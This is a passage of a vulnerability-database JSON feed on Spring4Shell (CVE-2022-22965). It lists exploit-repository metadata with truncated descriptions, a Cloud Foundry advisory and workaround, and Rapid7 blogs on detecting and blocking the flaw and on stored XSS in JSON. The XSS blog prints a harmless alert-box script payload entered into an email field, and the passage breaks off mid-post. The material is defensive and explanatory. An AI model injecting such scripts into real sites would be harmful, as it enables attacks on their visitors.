"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T08:35:57", "id": "3DB87825-2C58-5ABC-8BA3-E1CB80AFB11E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:19", "description": "# CVE-2022-22965 (Spring4Shell) Proof of Concept\n\n\n\nJust playin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T09:13:11", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T09:21:07", "id": "679F3E9E-1555-5391-86FF-CD3D67D80BDD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-13T04:10:51", "description": "# Spring4Shell-CVE-2022-22965.py\nScript to check for Spring4Shel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-09T08:40:49", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T03:32:59", "id": "F09161EA-B10D-5DBF-B548-6F9BE7EE20B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:14:28", "description": "# S\u00e5rbarheter i Spring Framework - CVE-2022-22965\r\n\r\n## Liste ov...", "cvss3": {}, "published": "2022-04-01T10:16:24", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T10:07:48", "id": "0273F07C-E2F1-5454-85F6-6B58CCA854A3", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:45", "description": "= Spring Framework version override showcase\n\nThis repository sh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:16:20", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T06:44:44", "id": "18E406F3-7737-558F-9993-BD12421447B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:26", "description": "<h1 align=\"center\">\n <br>\n spring4shell_victim\n <br>\n <br>...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T13:35:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T22:06:28", "id": "21FA1164-A4AD-57B4-8CFE-6B9B5EE9D199", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-18T22:19:56", "description": "# Spring4Shell-POC (CVE-2022-22965)\n\n via data binding.\n\n**Affected Cloud Foundry Products and Versions**\n\n_Severity is critical unless otherwise noted._\n\n * UAA Release (OSS) \n * Versions 74.2.0 \u2013 75.17.0\n * CF Deployment \n * Version 12.1.0 and above but below version 20.0\n\n**Mitigation**\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * UAA Release (OSS) \n * Upgrade affected versions to 75.18.0 or greater.\n * CF Deployment \n * Upgrade affected versions to 20.0 or greater.\n * Alternatively a workaround can be deployed on affected versions.\n\n**Workaround for CF Deployment \n**\n\n 1. Create a temporary ops file with the following content:\n \n \n - type: replace\r\n \u00a0 path: /releases/name=uaa\r\n \u00a0 value:\r\n \u00a0 \u00a0 \u00a0 name: uaa\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 url: https://bosh.io/d/github.com/cloudfoundry/uaa-release?v=75.18.0\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 version: \"75.18.0\"\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 sha1: 5f9c63ecf952e94ff3ce229eed25069c7ce2a6b0 \n \n--- \n \n 2. Apply this ops-file during subsequent bosh deploys for cf-deployment, until you upgrade cf-deployment to a version where this CVE is fixed. For more information on how to apply ops-files, read the section of the README: <https://github.com/cloudfoundry/cf-deployment#ops-files>\n\n**References:**\n\n<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n**History**\n\n2022-04-05: Initial vulnerability report published. \n2022-04-21: Added fixed version of CF Deployment\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "cloudfoundry", "title": "CVE-2022-22965: UAA affected by Spring Framework RCE via Data Binding on JDK 9+ | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CFOUNDRY:D24EF96EB1845EA8878001F85C1C2C75", "href": "https://www.cloudfoundry.org/blog/cve-2022-22965-uaa-affected-by-spring-framework-rce-via-data-binding-on-jdk-9/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-08T21:29:15", "description": "\n\nThe warm weather is starting to roll in, the birds are chirping, and Spring... well, [Spring4Shell](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) is making a timely entrance. If you\u2019re still recovering from [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), we\u2019re here to tell you you're not alone. While discovery and research of [CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) is evolving, [Rapid7 is committed](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>) to providing our customers updates and guidance. In this blog, we wanted to share some recent product enhancements across our [application security](<https://www.rapid7.com/fundamentals/web-application-security/>) portfolio to help our customers with easy ways to test and secure their apps against Spring4Shell.\n\n## What is Spring4Shell?\n\nBefore we jump into how we can help you with our products, let's give a quick overview of Spring4Shell. CVE-2022-22965 affects Spring MVC and Spring WebFlux applications running JDK versions 9 and later. A new feature was introduced in JDK version 9 that allows access to the ClassLoader from a Class. This vulnerability can be exploited for remote code execution (RCE). If you\u2019re looking for more detailed information on Spring4Shell, check out our overview blog [here](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## _Updated: _RCE Attack Module for Spring4Shell\n\nCustomers leveraging [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>), our dynamic application security testing (DAST) tool, can regularly assess the risk of their applications. InsightAppSec allows you to configure 100+ types of web attacks to simulate real-world exploitation attempts. While it may be April 1st, we\u2019re not foolin\u2019 around when it comes to our excitement in sharing [this update](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) to our RCE Attack Module that we\u2019ve included in the default All Modules Attack Template \u2013 specifically testing for Spring4Shell. \n\nCloud customers who already have the [All Modules Attack Template](<https://docs.rapid7.com/insightappsec/attack-templates>) enabled will automatically benefit from this new RCE attack as part of their regular scan cadence. As of April 4th, customers with [on-prem scan engines](<https://docs.rapid7.com/release-notes/appspider/20220404/>) can also benefit from this updated RCE attack module. For those customers with on-premises engines, make sure to have auto-upgrades turned on to automatically benefit from this updated Attack Module, or update manually to the latest scan engine. \n\n\n\n\n## _NEW:_ Block against Spring4Shell attacks\n\nIn addition to assessing your applications for attacks with InsightAppSec, we\u2019ve also got you covered when it comes to protecting your in-production applications. With [tCell](<https://www.rapid7.com/products/tcell/>), customers can both detect and block anomalous activity, such as Spring4Shell exploit attempts. Check out the GIF below on how to enable the recently added Spring RCE block rule in tCell.\n\n\n\n## _NEW:_ Identify vulnerable packages (such as CVE-2022-22965)\n\nA key component of Spring4Shell is detecting whether or not you have any vulnerable packages. tCell customers leveraging the [Java agent](<https://docs.rapid7.com/tcell/installing-the-java-agent-for-tomcat>) can determine if they have any vulnerable packages, including CVE-2022-22965, in their runtime environment.\n\nSimply navigate to tCell on the Insight Platform, select your application, and navigate to the [**Packages and Vulns**](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) tab. Here you can view any vulnerable packages that were detected at runtime, and follow the specified remediation guidance.\n\n\n\nCurrently, the recommended mitigation guidance is for Spring Framework users to update to the fixed versions. Further information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>).\n\n## Utilize OS commands\n\nOne of the benefits of using tCell\u2019s [app server agents](<https://docs.rapid7.com/tcell/install-an-agent>) is the fact that you can enable blocking (after confirming you\u2019re not blocking any legitimate commands) for OS commands. This will prevent a wide range of exploits including Shell commands. Below you will see an example of our [**OS Commands**](<https://docs.rapid7.com/tcell/command-injection>) dashboard highlighting the execution attempts, and in the second graphic, you\u2019ll see the successfully blocked OS command events.\n\n\n\n \n\n\n\n\n## What\u2019s next?\n\nWe recommend following [Spring\u2019s latest guidance](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) on remediation to reduce risk in your applications. If you\u2019re looking for more information at any time, we will continue to update both this blog, and our [initial response blog to Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). Additionally, you can always reach out to your customer success manager, support resources, or anyone on your Rapid7 account team. Happy April \u2013 and here\u2019s to hoping the only shells you deal with in the future are those found on the beach!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T22:26:36", "type": "rapid7blog", "title": "Securing Your Applications Against Spring4Shell (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T22:26:36", "id": "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "href": "https://blog.rapid7.com/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T16:01:21", "description": "\n\nI recently wrote a blog post on [injection-type vulnerabilities](<http://rapid7.com/blog/post/2021/10/19/owasp-top-10-deep-dive-injection-and-stack-traces-from-a-hackers-perspective/>) and how they were knocked down a few spots from 1 to 3 on the new [OWASP Top 10 for 2022](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). The main focus of that article was to demonstrate how stack traces could be \u2014 and still are \u2014 used via injection attacks to gather information about an application to further an attacker's goal. In that post, I skimmed over one of my all time favorite types of injections: [cross-site scripting (XSS)](<https://www.rapid7.com/fundamentals/cross-site-scripting/>).\n\nIn this post, I\u2019ll cover this gem of an exploit in much more depth, highlighting how it has managed to adapt to the newer environments of today\u2019s modern web applications, specifically the API and Javascript Object Notation (JSON).\n\nI know the term API is thrown around a lot when referencing web applications these days, but for this post, I will specifically be referencing requests made from the front end of a web application to the back end via ajax (Asynchronous JavaScript and XML) or more modern approaches like the fetch method in JavaScript.\n\nBefore we begin, I'd like to give a quick recap of what XSS is and how a legacy application might handle these types of requests that could trigger XSS, then dive into how XSS still thrives today in modern web applications via the methods mentioned so far.\n\n## What is cross-site scripting?\n\nThere are many types of XSS, but for this post, I\u2019ll only be focusing on persistent XSS, which is sometimes referred to as stored XSS.\n\nXSS is a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to execute malicious code \u2014 generally in the form of a browser-side script like JavaScript, for example \u2014 against an unsuspecting end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application accepts an input from a user without sanitizing, validating, escaping, or encoding it.\n\nBecause the end user\u2019s browser has no way to know not to trust the malicious script, the browser will execute the script. Because of this broken trust, attackers typically leverage these vulnerabilities to steal victims\u2019 cookies, session tokens, or other sensitive information retained by the browser. They could also redirect to other malicious sites, install keyloggers or crypto miners, or even change the content of the website.\n\nNow for the \"stored\" part. As the name implies, stored XSS generally occurs when the malicious payload has been stored on the target server, usually in a database, from input that has been submitted in a message forum, visitor log, comment field, form, or any parameter that lacks proper input sanitization.\n\nWhat makes this type of XSS so much more damaging is that, unlike reflected XSS \u2013 which only affects specific targets via cleverly crafted links \u2013 stored XSS affects any and everyone visiting the compromised site. This is because the XSS has been stored in the applications database, allowing for a much larger attack surface.\n\n## Old-school apps\n\nNow that we\u2019ve established a basic understanding of stored XSS, let's go back in time a few decades to when web apps were much simpler in their communications between the front-end and back-end counterparts.\n\nLet's say you want to change some personal information on a website, like your email address on a contacts page. When you enter in your email address and click the update button, it triggers the POST method to send the form data to the back end to update that value in a database. The database updates the value in a table, then pushes a response back to the web applications front end, or UI, for you to see. This would usually result in the entire page having to reload to display only a very minimal amount of change in content, and while it\u2019s very inefficient, nonetheless the information would be added and updated for the end user to consume.\n\nIn the example below, clicking the update button submits a POST form request to the back-end database where the application updates and stores all the values, then provides a response back to the webpage with the updated info.\n\n\n\n\n\n## Old-school XSS\n\nAs mentioned in my previous blog post on injection, I give an example where an attacker enters in a payload of <script>alert(\u201cThis is XSS\u201d)</script> instead of their email address and clicks the update button. Again, this triggers the POST method to take our payload and send it to the back-end database to update the email table, then pushes a response back to the front end, which gets rendered back to the UI in HTML. However, this time the email value being stored and displayed is my XSS payload, <script>alert(\u201cThis is XSS\u201d)</script>, not an actual email address.\n\n\n\nAs seen above, clicking the \u201cupdate\u201d button submits the POST form data to the back end where the database stores the values, then pushes back a response to update the UI as HTML.\n\n\n\nHowever, because our payload is not being sanitized properly, our malicious JavaScript gets executed by the browser, which causes our alert box to pop up as seen below.\n\n\n\nWhile the payload used in the above example is harmless, the point to drive home here is that we were able to get the web application to store and execute our JavaScript all through a simple contact form. Anyone visiting my contact page will see this alert pop up because my XSS payload has been stored in the database and gets executed every time the page loads. From this point on, the possible damage that could be done here is endless and only limited by the attacker\u2019s imagination\u2026 well, and their coding skills. \n\n## New-school apps\n\nIn the first example I gave, when you updated the email address on the contact page and the request was fulfilled by the backend, the entire page would reload in order to display the newly created or updated information. You can see how inefficient this is, especially if the only thing changing on the page is a single line or a few lines of text. Here is where ajax and/or the fetch method comes in.\n\n[Ajax, or the fetch method](<https://www.w3schools.com/whatis/whatis_ajax.asp>), can be used to get data from or post data to a remote source, then update the front-end UI of that web application without having to refresh the page. Only the content from the specific request is updated, not the entire page, and that is the key difference between our first example and this one.\n\nAnd a very popular format for said data being sent and received is JavaScript Object Notation, most commonly known as JSON. (Don't worry, I\u2019ll get back to those curly braces in just a bit.) \n\n## New-school XSS\n\n_(Well, not really, but it sounds cool.)_\n\nNow, let's pretend we\u2019ve traveled back to the future and our contact page has been rewritten to use ajax or the fetch method to send and receive data to and from the database. From the user's point of view, nothing has changed \u2014 still the same ol\u2019 form. But this time, when the email address is being updated, only the contact form refreshes. The entire page and all of its contents do not refresh like in the previous version, which is a major win for efficiency and user experience. \n\nBelow is an example of what a POST might look like formatted in JSON.\n\n\n\n\u201cWhat is JSON?\u201d you might ask. Short for JavaScript Object Notation, it is a lightweight text format for storing and transferring data and is most commonly used when sending data to and from servers. Remember those curly braces I mentioned earlier? Well, one quick and easy way to spot JSON is the formatting and the use of curly braces.\n\nIn the example above, you can see what our new POST looks like using ajax or the fetch method in JavaScript. While the end result is no different than before, as seen in the example below, the method that was used to update the page is quite different. The key difference here is that the data we\u2019re wanting to update is being treated as just that: data, but in the form of JSON as opposed to HTML.\n\n\n\nNow, let's inject the same XSS payload into the same email field and hit update. In the example below, you can see that our POST request has been wrapped in curly braces, using JSON, and is formatted a bit differently than previously before being sent to the back end to be processed.\n\n\n\n\n\nIn the example above, you can see that the application is allowing my email address to be the XSS payload in its entirety. However, the JavaScript here is only being displayed and not being executed as code by the browser, so the alert \u201cpop\u201d message never gets triggered as in the previous example. That again is the key difference from the original way we were fulfilling the requests versus our new, more modern way \u2014 or in short, using JSON instead of HTML.\n\nNow you might be asking yourself, what's wrong with allowing the XSS payload to be the email address if it's only being displayed and not being executed as JavaScript by the browser. That is a valid question, but hear me out.\n\nSee, I've been working in this industry long enough to know that the two most common responses to a question or statement regarding cybersecurity begin with either \u201cthat depends\u2026\u201d or \u201cwhat if\u2026\u201d I'm going to go with the latter here and throw a couple what-ifs at you.\n\nNow that my XSS is stored in your database, it\u2019s only a matter of time before this ticking time bomb goes off. Just because my XSS is being treated as JSON and not HTML now does not mean that will always be the case, and attackers are betting on this.\n\nHere are a few scenarios.\n\n### Scenario 1\n\nWhat if team B handles this data differently from team A? What if team B still uses more traditional methods of sending and receiving data to and from the back end and does leverage the use of HTML and not JSON? \n\nIn that case, the XSS would most likely eventually get executed. It might not affect the website that the XSS was originally injected into, but the stored data can be (and usually is) also used elsewhere. The XSS stored in that database is probably going to be shared and used by multiple other teams and applications at some point. The odds of all those different teams leveraging the exact same standards and best practices are slim to none, and attackers know this. \n\n### Scenario 2\n\nWhat if, down the road, a developer using more modern techniques like ajax or the fetch method to send and receive data to and from the back end decides to use the .innerHTML property instead of .innerTEXT to load that JSON into the UI? All bets are off, and the stored XSS that was previously being protected by those lovely curly braces will now most likely get executed by the browser.\n\n### Scenario 3\n\nLastly, what if the current app had been developed to use server-side rendering, but a decision from higher up has been made that some costs need to be cut and that the company could actually save money by recoding some of their web apps to be client-side rather than server-side? \n\nPreviously, the back end was doing all the work, including sanitizing all user input, but now the shift will be for the browser to do all the heavy lifting. Good luck spotting all the XSS stored in the DB \u2014 in its previous state, it was \u201charmless,\u201d but now it could get rendered to the UI as HTML, allowing the browser to execute said stored XSS. In this scenario, a decision that was made upstream will have an unexpected security impact downstream, both figuratively and literally \u2014 a situation that is all too well-known these days.\n\n## Final thoughts\n\nPart of my job as a security advisor is to, well, advise. And it's these types of situations that keep me up at night. I come across XSS in applications every day, and while I may not see as many fun and exciting \u201cpops\u201d as in years past, I see something a bit more troubling. \n\nThis type of XSS is what I like to call a \u201csleeper vuln\u201d \u2013 laying dormant, waiting for the right opportunity to be woken up. If I didn't know any better, I'd say XSS has evolved and is aware of its new surroundings. Of course, XSS hasn\u2019t evolved, but the applications in which it lives have. \n\nAt the end of the day, we\u2019re still talking about the same XSS from its conception, the same XSS that has been on the [OWASP Top 10](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) for decades \u2014 what we\u2019re really concerned about is the lack of sanitization or handling of user input. But now, with the massive adoption of JavaScript frameworks like Angular, libraries like React, the use of APIs, and the heavy reliance on them to handle the data properly, we\u2019ve become complacent in our duties to harden applications the proper way.\n\nThere seems to be a division in camps around XSS in JSON. On the one hand, some feel that since the JavaScript isn't being executed by the browser, everything is fine. Who cares if an email address (or any data for that matter) is potentially dangerous \u2014 _**as long as**_ it's not being executed by the browser. And on the other hand, you have the more fundamentalist, dare I say philosophical thought that all user input should never be trusted: It should always be sanitized, regardless of whether it\u2019s treated as data or not \u2014 and not solely because of following best coding and security practices, but also because of the \u201cthat depends\u201d and \u201cwhat if\u201d scenarios in the world. \n\nI'd like to point out in my previous statement above, that \u201c_**as long as**_\u201d is vastly different from _**\u201c**cannot._\u201d \u201cAs long as\u201d implies situational awareness and that a certain set of criteria need to be met for it to be true or false, while \u201ccannot\u201d is definite and fixed, regardless of the situation or criteria. \u201cAs long as the XSS is wrapped in curly braces\u201d means it does not pose a risk in its current state but could in other states. But if input is sanitized and escaped properly, the XSS would never exist in the first place, and thus it \u201ccannot\u201d or could not be executed by the browser, ever.\n\nI guess I cannot really complain too much about these differences of opinions though. The fact that I'm even having these conversations with others is already a step in the right direction. But what does concern me is that it's 2022, and we\u2019re still seeing XSS rampant in applications, but because it's wrapped in JSON somehow makes it acceptable. One of the core fundamentals of my job is to find and prioritize risk, then report. And while there is always room for discussion around the severity of these types of situations, lots of factors have to be taken into consideration, a spade isn't always a spade in [application security](<https://www.rapid7.com/fundamentals/web-application-security/>), or cybersecurity in general for that matter. But you can rest assured if I find XSS in JSON in your environment, I will be calling it out. \n\nI hope there will be a future where I can look back and say, \u201cRemember that one time when curly braces were all that prevented your website from getting hacked?\u201d Until then, JSON or not, never trust user data, and sanitize all user input (and output for that matter). A mere { } should never be the difference between your site getting hacked or not.\n\n_**Additional reading:**_\n\n * _[Cloud-Native Application Protection (CNAPP): What's Behind the Hype?](<https://www.rapid7.com/blog/post/2022/05/02/cloud-native-application-protection-cnapp-whats-behind-the-hype/>)_\n * _[Rapid7 Named a Visionary in 2022 Magic Quadrant\u2122 for Application Security Testing Second Year in a Row](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>)_\n * _[Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1](<https://www.rapid7.com/blog/post/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/>)_\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T15:48:03", "type": "rapid7blog", "title": "XSS in JSON: Old-School Attacks for Modern Applications", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-04T15:48:03", "id": "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "href": "https://blog.rapid7.com/2022/05/04/xss-in-json-old-school-attacks-for-modern-applications/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-15T15:31:14", "description": "> _To the left, to the left, to the right, right \u2014 the CI/CD Pipeline is on the move._\n\n\n\nDevSecOps is all about adding security across the application lifecycle. A popular approach to application security is to [shift left](<https://www.rapid7.com/blog/post/2021/09/27/to-the-left-your-guide-to-infrastructure-as-code-for-shifting-left/>), which means moving security earlier in the [software development lifecycle (SDLC)](<https://www.rapid7.com/fundamentals/software-development-life-cycle-sdlc/>). This makes sense: If you find a critical security bug in production, it costs a lot more to resolve it than if you found it in development.\n\nIn Q1 2022, we've continued to invest in improvements to [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) and [tCell](<https://www.rapid7.com/products/tcell/>) that help organizations shift left and automate security testing prior to production deployment. And at the same time, we've made other enhancements to make your life easier. Oh\u2026 and we added new attacks and blocking rules for [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## Shifting app security testing left in the CI/CD pipeline\n\nYour development teams are innovating and releasing features and new experiences faster than ever before. Manual testing can no longer 